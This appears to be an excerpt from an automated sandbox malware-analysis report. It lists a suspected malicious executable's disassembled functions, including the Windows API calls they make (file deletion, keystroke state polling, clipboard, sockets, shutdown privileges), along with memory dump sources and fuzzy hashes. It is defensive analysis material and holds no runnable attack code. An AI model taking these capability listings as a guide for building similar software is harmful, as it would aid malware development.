                                                                              • _wcscmp.LIBCMT ref: 00911D6B
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00911D7D
                                                                              • SetCurrentDirectoryW.KERNEL32(009739FC), ref: 00911D9B
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00911DA5
                                                                              • FindClose.KERNEL32(00000000), ref: 00911DB2
                                                                              • FindClose.KERNEL32(00000000), ref: 00911DC2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                              • String ID: *.*
                                                                              • API String ID: 1824444939-438819550
                                                                              • Opcode ID: d7fbf1bec741d32594171f22e9f2103dd04e2d47b990c497d7f9d90f388bc34c
                                                                              • Instruction ID: b3889d53efa780b1940676b8d3d3ec27566d789e3cfb3fdd48b5c901e7bd9003
                                                                              • Opcode Fuzzy Hash: d7fbf1bec741d32594171f22e9f2103dd04e2d47b990c497d7f9d90f388bc34c
                                                                              • Instruction Fuzzy Hash: 2D31243A60561EBADF10EFA4EC09EDE37ACAF46324F104555EA11E30D0DB70DAC58BA4
                                                                              Function 008C7D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _memset
                                                                              • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                              • API String ID: 2102423945-2023335898
                                                                              • Opcode ID: 432ce2afa1ebbfd5fa978987cf1ce8de84c89f215807beb626ca8a1f6bcf8982
                                                                              • Instruction ID: b96cb5040b224312fa3e6d4e83cf8244098fd49d23d28142cd62d3c76a4b8d66
                                                                              • Opcode Fuzzy Hash: 432ce2afa1ebbfd5fa978987cf1ce8de84c89f215807beb626ca8a1f6bcf8982
                                                                              • Instruction Fuzzy Hash: 8C828D72D04219DBCB24CF98C890BADBBB1FF48314F2581AAD859AB251E774DD85CF90
                                                                              Function 0091091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLocalTime.KERNEL32(?), ref: 009109DF
                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 009109EF
                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009109FB
                                                                              • __wsplitpath.LIBCMT ref: 00910A59
                                                                              • _wcscat.LIBCMT ref: 00910A71
                                                                              • _wcscat.LIBCMT ref: 00910A83
                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00910A98
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00910AAC
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00910ADE
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00910AFF
                                                                              • _wcscpy.LIBCMT ref: 00910B0B
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00910B4A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                              • String ID: *.*
                                                                              • API String ID: 3566783562-438819550
                                                                              • Opcode ID: 1e7d71b1ffd35b768dc8ddc6daeddb37e6521dc1c939028522d72ffc45c11c36
                                                                              • Instruction ID: 8ced8983905fa418b22f646f3828d90dea12dddda6541c8668ed035acc990d57
                                                                              • Opcode Fuzzy Hash: 1e7d71b1ffd35b768dc8ddc6daeddb37e6521dc1c939028522d72ffc45c11c36
                                                                              • Instruction Fuzzy Hash: AC6149766082099FD710EF64C845E9EB3E8FF89310F04891EF989C7251DB76E985CB92
                                                                              Function 008FA66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008FABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 008FABD7
                                                                                • Part of subcall function 008FABBB: GetLastError.KERNEL32(?,008FA69F,?,?,?), ref: 008FABE1
                                                                                • Part of subcall function 008FABBB: GetProcessHeap.KERNEL32(00000008,?,?,008FA69F,?,?,?), ref: 008FABF0
                                                                                • Part of subcall function 008FABBB: HeapAlloc.KERNEL32(00000000,?,008FA69F,?,?,?), ref: 008FABF7
                                                                                • Part of subcall function 008FABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 008FAC0E
                                                                                • Part of subcall function 008FAC56: GetProcessHeap.KERNEL32(00000008,008FA6B5,00000000,00000000,?,008FA6B5,?), ref: 008FAC62
                                                                                • Part of subcall function 008FAC56: HeapAlloc.KERNEL32(00000000,?,008FA6B5,?), ref: 008FAC69
                                                                                • Part of subcall function 008FAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,008FA6B5,?), ref: 008FAC7A
                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 008FA6D0
                                                                              • _memset.LIBCMT ref: 008FA6E5
                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 008FA704
                                                                              • GetLengthSid.ADVAPI32(?), ref: 008FA715
                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 008FA752
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008FA76E
                                                                              • GetLengthSid.ADVAPI32(?), ref: 008FA78B
                                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 008FA79A
                                                                              • HeapAlloc.KERNEL32(00000000), ref: 008FA7A1
                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 008FA7C2
                                                                              • CopySid.ADVAPI32(00000000), ref: 008FA7C9
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 008FA7FA
                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008FA820
                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 008FA834
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                              • String ID:
                                                                              • API String ID: 3996160137-0
                                                                              • Opcode ID: 602899c365185350903ad6d156eeff215b197e8103f5bb159625185a5f536bec
                                                                              • Instruction ID: 182b3defb185eb33c2ca8064466d584d45ace7e683fc64a291597c3bea2bb274
                                                                              • Opcode Fuzzy Hash: 602899c365185350903ad6d156eeff215b197e8103f5bb159625185a5f536bec
                                                                              • Instruction Fuzzy Hash: 315169B5910209ABCF08DFA4DC44EFEBBB9FF05310F048129EA19E7290DB349A15DB61
                                                                              Function 008C6F07 Relevance: 18.4, Strings: 14, Instructions: 883COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                              • API String ID: 0-4052911093
                                                                              • Opcode ID: 851bd8b0a9325b4637a17ae4780922224063522c098e01a03b7de4c86ed481bd
                                                                              • Instruction ID: e6d5889e2d7d7328372b3b007e4e2e11ee2ea2465ca50152b22c31908c3605e1
                                                                              • Opcode Fuzzy Hash: 851bd8b0a9325b4637a17ae4780922224063522c098e01a03b7de4c86ed481bd
                                                                              • Instruction Fuzzy Hash: AB725E71E04219DBDB24CF68C880BAEB7B5FF48310F54816AE945EB281EB749E41DF94
                                                                              Function 009063F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00906EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00905FA6,?), ref: 00906ED8
                                                                                • Part of subcall function 009072CB: GetFileAttributesW.KERNEL32(?,00906019), ref: 009072CC
                                                                              • _wcscat.LIBCMT ref: 00906441
                                                                              • __wsplitpath.LIBCMT ref: 0090645F
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00906474
                                                                              • _wcscpy.LIBCMT ref: 009064A3
                                                                              • _wcscat.LIBCMT ref: 009064B8
                                                                              • _wcscat.LIBCMT ref: 009064CA
                                                                              • DeleteFileW.KERNEL32(?), ref: 009064DA
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 009064EB
                                                                              • FindClose.KERNEL32(00000000), ref: 00906506
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                              • String ID: \*.*
                                                                              • API String ID: 2643075503-1173974218
                                                                              • Opcode ID: f839177ca765eeb7c275363f653c8bacfd34c7ce33d2edd8a94d5404e1833daf
                                                                              • Instruction ID: cdfb1141ee0963b828794a228bb463012001b09b581d04b892cccf6b487be139
                                                                              • Opcode Fuzzy Hash: f839177ca765eeb7c275363f653c8bacfd34c7ce33d2edd8a94d5404e1833daf
                                                                              • Instruction Fuzzy Hash: 5D3171B240C3849EC721DBA88C85DDBB7DCAF96314F44492AF6D8C3181EB35D54987A7
                                                                              Function 009231BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00923C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00922BB5,?,?), ref: 00923C1D
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0092328E
                                                                                • Part of subcall function 008C936C: __swprintf.LIBCMT ref: 008C93AB
                                                                                • Part of subcall function 008C936C: __itow.LIBCMT ref: 008C93DF
                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0092332D
                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009233C5
                                                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00923604
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00923611
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                              • String ID:
                                                                              • API String ID: 1240663315-0
                                                                              • Opcode ID: 7af1d15d52b75d678825d677f364fa3e5af9e2bf0268864be5bc7a9aae677012
                                                                              • Instruction ID: 44f121639d7c5b8e4ca62687b0af195a8f6a858f2b38fabb8e6252b11d1a633e
                                                                              • Opcode Fuzzy Hash: 7af1d15d52b75d678825d677f364fa3e5af9e2bf0268864be5bc7a9aae677012
                                                                              • Instruction Fuzzy Hash: C5E14875604210AFCB14DF28D895E2ABBF9FF89310B04896DF44ADB2A5DB34ED05CB52
                                                                              Function 00902B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?), ref: 00902B5F
                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00902BE0
                                                                              • GetKeyState.USER32(000000A0), ref: 00902BFB
                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00902C15
                                                                              • GetKeyState.USER32(000000A1), ref: 00902C2A
                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00902C42
                                                                              • GetKeyState.USER32(00000011), ref: 00902C54
                                                                              • GetAsyncKeyState.USER32(00000012), ref: 00902C6C
                                                                              • GetKeyState.USER32(00000012), ref: 00902C7E
                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00902C96
                                                                              • GetKeyState.USER32(0000005B), ref: 00902CA8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: State$Async$Keyboard
                                                                              • String ID:
                                                                              • API String ID: 541375521-0
                                                                              • Opcode ID: a34c3759c70cbad1a0c80fad0084c068621b4a3e58c456db43510d5d7ba22fa6
                                                                              • Instruction ID: 512f203ec127ae752da9b2e951902862e86c454ce9e9db55e50741e67042a06b
                                                                              • Opcode Fuzzy Hash: a34c3759c70cbad1a0c80fad0084c068621b4a3e58c456db43510d5d7ba22fa6
                                                                              • Instruction Fuzzy Hash: B54108345187D96DFF359B60880C7B9BFA96F22304F0480DDD5C6566C2EFA499C8C7A2
                                                                              Function 00916D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                              • String ID:
                                                                              • API String ID: 1737998785-0
                                                                              • Opcode ID: ec8f7f38aec5ca3e011a4513b951085326ba7a72e3beaa93658459494a0a0c8c
                                                                              • Instruction ID: 6b94b1ba23a926428b2cbd8c93c90c832807cf093347bdf1bcac56d9bfe22871
                                                                              • Opcode Fuzzy Hash: ec8f7f38aec5ca3e011a4513b951085326ba7a72e3beaa93658459494a0a0c8c
                                                                              • Instruction Fuzzy Hash: 1E21BC39715114AFDB00AF28EC49F6D77A8FF45710F01841AF94ADB2A1CB74EC419B51
                                                                              Function 0091C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008F9ABF: CLSIDFromProgID.OLE32 ref: 008F9ADC
                                                                                • Part of subcall function 008F9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 008F9AF7
                                                                                • Part of subcall function 008F9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 008F9B05
                                                                                • Part of subcall function 008F9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 008F9B15
                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0091C235
                                                                              • _memset.LIBCMT ref: 0091C242
                                                                              • _memset.LIBCMT ref: 0091C360
                                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0091C38C
                                                                              • CoTaskMemFree.OLE32(?), ref: 0091C397
                                                                              Strings
                                                                              • NULL Pointer assignment, xrefs: 0091C3E5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                              • String ID: NULL Pointer assignment
                                                                              • API String ID: 1300414916-2785691316
                                                                              • Opcode ID: c7992a3aeb0ef37290c8f62cb31c194a810aa1caccdc5775cc8d5b6cf50d0f55
                                                                              • Instruction ID: dc7ef5df9afdf8969832be4bda71d266e1e65d1458fc813b0ea1019f2ec99c2e
                                                                              • Opcode Fuzzy Hash: c7992a3aeb0ef37290c8f62cb31c194a810aa1caccdc5775cc8d5b6cf50d0f55
                                                                              • Instruction Fuzzy Hash: FA910971E4021CABDB10DFA4DC51EEEBBB9FF04710F10816AE519A7291DB709A45CFA1
                                                                              Function 009079D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008FB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008FB180
                                                                                • Part of subcall function 008FB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008FB1AD
                                                                                • Part of subcall function 008FB134: GetLastError.KERNEL32 ref: 008FB1BA
                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 00907A0F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                              • String ID: $@$SeShutdownPrivilege
                                                                              • API String ID: 2234035333-194228
                                                                              • Opcode ID: 92cc34ccd6b049371b61bce3af3512081ee7760d4011477b1a005d5ad4e3ff68
                                                                              • Instruction ID: b78be2f35c6652295162825e2258251bef357f129a7d4d3c4980c14c298b46f7
                                                                              • Opcode Fuzzy Hash: 92cc34ccd6b049371b61bce3af3512081ee7760d4011477b1a005d5ad4e3ff68
                                                                              • Instruction Fuzzy Hash: B201F775F692116EF72856F8CC5AFBFB35C9B00360F244824F953E20C2D9A4BE0091B1
                                                                              Function 00918C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00918CA8
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00918CB7
                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00918CD3
                                                                              • listen.WSOCK32(00000000,00000005), ref: 00918CE2
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00918CFC
                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00918D10
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                                                              • String ID:
                                                                              • API String ID: 1279440585-0
                                                                              • Opcode ID: 63d98d23322bbd272a49609360b1e186455e847e44791913707a49773e5b7efb
                                                                              • Instruction ID: 41d98293093c04a9380b117acfeef7de6d60f8c2ae90bac4f63f6070959d1495
                                                                              • Opcode Fuzzy Hash: 63d98d23322bbd272a49609360b1e186455e847e44791913707a49773e5b7efb
                                                                              • Instruction Fuzzy Hash: 4221CE79601204AFCB10EF68D845FAEB7A9FF49310F108158E956A73D2CB30AD419B51
                                                                              Function 00906532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00906554
                                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00906564
                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00906583
                                                                              • __wsplitpath.LIBCMT ref: 009065A7
                                                                              • _wcscat.LIBCMT ref: 009065BA
                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 009065F9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                              • String ID:
                                                                              • API String ID: 1605983538-0
                                                                              • Opcode ID: 2030d59215f79c51c25975b21686a3593f2e0df4ce898b12975c7a69ae1cde71
                                                                              • Instruction ID: c6e1ec36a67a6b2df34c9c86ed0ae7322b610de5e4b3e6fe45bb942b15e911ab
                                                                              • Opcode Fuzzy Hash: 2030d59215f79c51c25975b21686a3593f2e0df4ce898b12975c7a69ae1cde71
                                                                              • Instruction Fuzzy Hash: 1C219275904258AFDB20ABA4CC88FEEB7BCAB49300F5004A5F505E3181EB75AF85CB61
                                                                              Function 0091923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0091A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0091A84E
